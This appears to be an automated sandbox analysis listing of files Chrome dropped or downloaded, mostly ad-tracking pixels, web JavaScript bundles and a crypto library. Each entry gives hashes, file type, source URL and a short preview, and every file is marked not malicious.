                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=r1&google_push=AXcoOmSqIb93eb_Y8NL6ZIDoI0pp8Crd_XdqV5xercgVO9O9U_al-KNNBhN2MJEonvqfdKFkKZX_-wExtAl4PaChADKm-NNSGAJA&google_hm=A8EYUG2QMEanhCqf80immOI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (11090)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):11091
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.370414395163306
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:WjN3tsWtOu2msfio8jSeIIzUB0MIb7ubYufAyh8qYSptHO05NcIw7VxS8aZ2lyzG:WjNWutxumQnIbiYufhhPtHO6CO8ms8gR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:208DEF83F87951FBD4145A8A2CD25134
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FD2AF4ED1CB2714A2391E17640A26EF31E345BCA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EEFF9DF15E40621CC4B9B48EF9BEC776F60B632AD10618EB208F3494DA5235B7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:03F870C3ED8DFF56ABF0D17AC5977B791FA317D8114AF046B59A14CC8DBF9D0A7C01E4BDEAEEDDD31821E2AE0D0ADB528B6B1710716CEA3B744B0C9040FF469B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{B as se,n as B,r as x,g as W,t as T}from"../chunks/commonUtil.CI22_Irn.js";import{s as R,p as N,k as b,i as d,e as I,b as E,d as L,f as z,j as v,W as re,q as D,U as H,l as C,G as ie,t as V,h as G,n as j,o as ee,N as J,c as le,u as fe,g as ae,a as oe,H as me,z as ue}from"../chunks/scheduler.Dr9AAxFe.js";import{S as q,i as F,t as p,g as P,a as _,e as M,c as w,b as y,m as h,d as A}from"../chunks/index.DCSmZEjO.js";import{p as pe}from"../chunks/stores.DPDRpTFd.js";import{A as ce,P as $e,b as _e,G as ge,M as de,D as be,C as ke,a as we}from"../chunks/PageProgressBar.BGwewH1i.js";import ye from"../chunks/Ads.Bxzxpy-0.js";import{H as he}from"../chunks/Header.Db1Xn_Q6.js";import{L as te}from"../chunks/Link.Cll6KZpb.js";import{B as Ae}from"../chunks/Button.DpT5MMuf.js";import{C as Ee}from"../chunks/close.C3ug6nNR.js";import{T as ne}from"../chunks/Typography.BwmQDYSG.js";const ve=!1,Oe="always",Se=async({data:l,url:t})=>{const{crumb:n="",headerResponse:e,pages:s,portfolios:a,session:u,serv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (23479), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):23479
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.181521598468942
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:rFfj/6GpZNfFQi4mvfm0N+Dzao0QMyb0+qB9M:5L/vLNQi4m3m02zMQMyb05s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E6A743E22F5B7027F77359F0A549572B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:3EE7D7C1F50B654AFF770E4EED916502D7D62B7B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E6C22E612E82D6AF3F495357F5EF64A81467312A4A817F3625B15490629257EA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6A440F8772A29CF710417746BBF0AF9994C6C609BAD6B313DAB3FFC8F73BB4947E7AF8D52D3DEEBC78B4863BC961F5501A03768C78AD2BECC490CBB0838819FB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/notifications/js/sh-5.17.91.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(){var r="BrowserSubscriptionHelper",i=["chrome","chrome mobile"],p="error",f="info",n="pushNotifications",o="undefined",t="Unsupported Browser.",u="granted",a="denied",c="subscriptions",s="type",d="push",e="display-push-promos",l="js-push-subscribe",h="rapidnofollow",b="subscriptionFail",m="Permission denied by user";function g(e,n,i){this.init(e,n,i)}if(g.prototype={init:function(e,n,i){var r=this;r.beaconer=n,r.tracker=i,r.config={appServerPubKey:e.appServerPubKey,bucket:e.bucket,confirmationNotification:e.confirmationNotification||{},enableIndexedDbDurationBeacon:e.enableIndexedDbDurationBeacon||!1,enablePermissionChangeBeacon:e.enablePermissionChangeBeacon||!1,overlay:e.overlay||{},resubscribeOnChurn:e.resubscribeOnChurn||!1,serviceWorkerScope:e.serviceWorkerScope||"/",serviceWorkerUrl:e.serviceWorkerUrl,spaceId:e.spaceId,subscriptionService:e.subscriptionService||{},supportedBrowsers:e.supportedBrowsers||{},userAgent:e.userAgent||{}},r.appServerPubKeyArr=r.urlB64ToUint8A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.189556750542293
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:OC0hNejBlJQ3iPgsH9RIkpve4f:OC0hNuBlJ9PgsH9+kQo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5717AF82EB2399591BF74C848124CA17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A5F8E0F946718400AB44717E38406D4DB349BFB8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E7FB843F4580DCC3C6D80BD89F9AF2B81F539F8A488CC8A9AEA81E1697153687
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BB36332030E00D17D7FBE4EC7007FA13A764F2D57A5A164E8BF8FEF99F23A7972457805A0CDC05CA4EBC888F5930C24D076FBD0241B3E788DBC427CEED136CDA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:TRC.getRTUS({"status":"OK","userid":"rE988lVX4hFkNsO4ITf6JfyO-gkN8FQc"});
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):48699
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.160788788880504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:DbMYCbBB4pEx9PgdVTrC7MQ+iIo2EBOCoSMgaQMEleYNiLyizRhH2Fv/H+9f2CSW:XMbbBB4pEx9Pgq7MQ+iIo2EBOCoSMgaV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:174BEC9893E8788E1B234F6A8D203F98
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1F23EB0B803F4957C88E584D35EE9A15846A70A1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2EC853A5FBF4DB41603FE4799D6622381F393B487C128FE828AA63AE3AFE410E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EB01CB0F43D7878C16A87D1D56BB7889985BDB06F6D060B5AC883950851469B71FBCE03846ABF9B5CD329AA6C4F91871137F1C344FAB9D2588636EDAC9A9EAFC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{. "brandProtection": {. "badv": {. "1111.com.tw": true,. "1keygou.com": true,. "3oaksorchard.com": true,. "43cbd.com": true,. "4everstamp.com": true,. "aax.com": true,. "abloodsugaroption.com": true,. "abra.com": true,. "accessmediaportal.com": true,. "acebarry.com": true,. "acticatin.com": true,. "actiongamesplace.com": true,. "actualitateavranceana.ro": true,. "adameve.com": true,. "adblocker.vpnwelt.com": true,. "aditore.com": true,. "adlock.com": true,. "adpushup.com": true,. "adremover.com": true,. "adremover.org": true,. "adrenal.ru": true,. "adriangadea.ro": true,. "adrianvigheciu.ro": true,. "adroll.com": true,. "ads.google.com": true,. "ads.sharebeast.com": true,. "adsterra.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:glTF binary model, version 2, length 1841952 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1841952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.86927842319831
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:NJ2AYlfCy6sMGu403r//q1ipQE9L6aNzFuLXpgc:NwAYhH25L37q1IQEd1NJurp1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F8FAB757395B1D3E4F37A079489271BF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:401A8F8FEB388DA74E74D9A06732FBF1C6E350DB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:02E2BE780B07C3BC5026A1E7D90C4B7AED7C9C557526D52101596BD8638C57BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E1CD38D0D0B9355580874029BBA6FFD09E2788411B97C236AA3CE16E19FF14217E6EC5A8142A6BAA6BF19A05F85FE45B5A871851CF8BF5E8855C552C8B792556
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:glTF.... ....)..JSON{"accessors":[{"componentType":5126,"count":2651,"max":[-70.35702514648438,146.69488525390625,105.8648681640625],"min":[-528.452880859375,26.264026641845703,-107.17500305175781],"type":"VEC3"},{"componentType":5126,"count":2651,"type":"VEC2"},{"componentType":5126,"count":2651,"type":"VEC3"},{"componentType":5123,"count":12495,"type":"SCALAR"},{"componentType":5126,"count":665,"max":[-88.003662109375,144.195556640625,84.04291534423828],"min":[-518.326171875,37.52769470214844,-84.03582000732422],"type":"VEC3"},{"componentType":5126,"count":665,"type":"VEC2"},{"componentType":5126,"count":665,"type":"VEC3"},{"componentType":5123,"count":2832,"type":"SCALAR"},{"componentType":5126,"count":2179,"max":[-183.5447998046875,143.3338623046875,81.40294647216797],"min":[-519.1409912109375,34.82791519165039,-79.76844024658203],"type":"VEC3"},{"componentType":5126,"count":2179,"type":"VEC2"},{"componentType":5126,"count":2179,"type":"VEC3"},{"componentType":5123,"count":6879,"ty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):47992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.605846858683577
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pagead2.googlesyndication.com/pagead/gen_204?id=xbid&dbm_b=AKAmf-AszUBIrDK9EeXhuUYX6duu6ioXRrgAtf0oEFr2Z1isgJHQYVW8z611j1HgznAPfhABz72kj3nRj7C5-x4jWnw4krFvdtWqGRMWdrUPA5CvGEM8FSg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (64561)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):494354
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.505846375527451
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6144:VArhbX/q8//4a+kOcO71c6OyBQxkd2SekeofTNTga5zV/iGcN7LgPuW4zEhFV/uO:qlAr9Oyaa/eggsVtkQPRm7j2VE0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2F8287CDD69B88555206A23C7DC2ECB7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B59389B66385EBDA785016AE6A0E8443C9294434
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:687524CDE30FE73542B07A1B40A9E4217E6080CA31489A89C22F027FB758F8E7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:72B280253AD33468A4BFC0F236930657236D0A00D011B30BBF1FC72F57CA3FCB2F7CC6E8328EA26D2D6214D38CE7FF76F733175A15C7EECBE2A6EF343EBD9FCD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://securepubads.g.doubleclick.net/pagead/managed/js/gpt/m202410030101/pubads_impl.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(_){/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . Copyright Google LLC . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . . Copyright (c) 2015-2018 Google, Inc., Netflix, Inc., Microsoft Corp. and contributors . Licensed under the Apache License, Version 2.0 (the "License"); . you may not use this file except in compliance with the License. . You may obtain a copy of the License at . http://www.apache.org/licenses/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software . distributed under the License is distributed on an "AS IS" BASIS, . WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. . See the License for the specific language governing permissions and . limitations under the License. .*/ ./* . .Math.uuid.js (v1.4) .http://www.broofa.com .mailto:robert@broofa.com .Copyright (c) 2010 Robert Kieffer .Dual licensed under the MIT and GPL licenses. .*/ .var ba,ea,ja,xa,za,Ca,Ia,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):269
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.235195150873638
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:hn8FQiowadCc4svmzsMX5mBQLzLcIjEdxvAqJmW/upLV4HX4QL:hnMQbwuO4M2e4xYqJmWeV4IQL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C7B1A96E4676C76C0240D4A835FB7252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8A4DE304873BB5A8C11DD86B86CC8B8356BAD8B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E4DF52D49C57BC3E7158CB052CC05C60F1258C24DE5C5728DAC5D43272943AD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:349FE7702C3A1355026D9051B3BDF4143358A34A416DF67099E7FA16CACD72270E40DAF59C24C1FE0C6705F91AEDABD0E9D8298985E6A3BF9F133C08DC07AD86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://eus.rubiconproject.com/usync.html?gdpr=0&us_privacy=1YNN&gpp=DBAA&gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">. Copyright Magnite 2024 -->.<html>.<head>. <title>User-Sync</title>.</head>.<body>. <script type="text/javascript" src="usync.js"></script>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=appnexus&google_hm=Njg2MzQ1NjYxOTQyMTI0ODA3Mg%3D%3D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (3207)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.390886814946991
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:1MFN+4WIWFEFwiBnAKQZyywiyPDyrM8j9CV50OSek7NFGyMlsH:y+4xCmbXywH6j9CVi5ekzGTI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:48AAA9AEBD992E9D248A71B5961041E5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:AEAE682E66B7681DAC986E4A1700125FA8AF103C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0890320BEDD0E59BC2440FA4F9873DC567A0755DD84FCF8B2E763948C075704D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A2354AEFD184F243503B9EFD088358C90B2157F4FD07092C7F4E5F8184B7DF88928BBBC5084EB3128EF163969EB40AD33455598F29D0E3D64F37E0AE79FD9030
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as B,A as k,e as C,b as D,d as E,f as G,j as P,i as U,B as M,U as u,k as T,l as Z,G as v,Y as N,T as F,c as H,u as J,g as K,a as O,Z as Q}from"./scheduler.Dr9AAxFe.js";import{S as R,i as V,t as m,g as q,a as g,e as y,c as W,b as X,m as p,d as w}from"./index.DCSmZEjO.js";import{g as x}from"./spread.CgU5AtxT.js";import{I as $}from"./Icon.BSWt_jx8.js";import{g as A}from"./i13nUtil.C-uBpR7k.js";function I(n){let e;const a=n[12].default,l=H(a,n,n[11],null);return{c(){l&&l.c()},l(s){l&&l.l(s)},m(s,r){l&&l.m(s,r),e=!0},p(s,r){l&&l.p&&(!e||r&2048)&&J(l,a,s,s[11],e?O(a,s[11],r,null):K(s[11]),null)},i(s){e||(m(l,s),e=!0)},o(s){g(l,s),e=!1},d(s){l&&l.d(s)}}}function L(n){let e,a;return e=new $({props:{size:n[6]||n[5],icon:n[4],type:"inherit"}}),{c(){W(e.$$.fragment)},l(l){X(e.$$.fragment,l)},m(l,s){p(e,l,s),a=!0},p(l,s){const r={};s&96&&(r.size=l[6]||l[5]),s&16&&(r.icon=l[4]),e.$set(r)},i(l){a||(m(e.$$.fragment,l),a=!0)},o(l){g(e.$$.fragment,l),a=!1},d(l){w(e,l)}}}function ee(n){let e,a,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
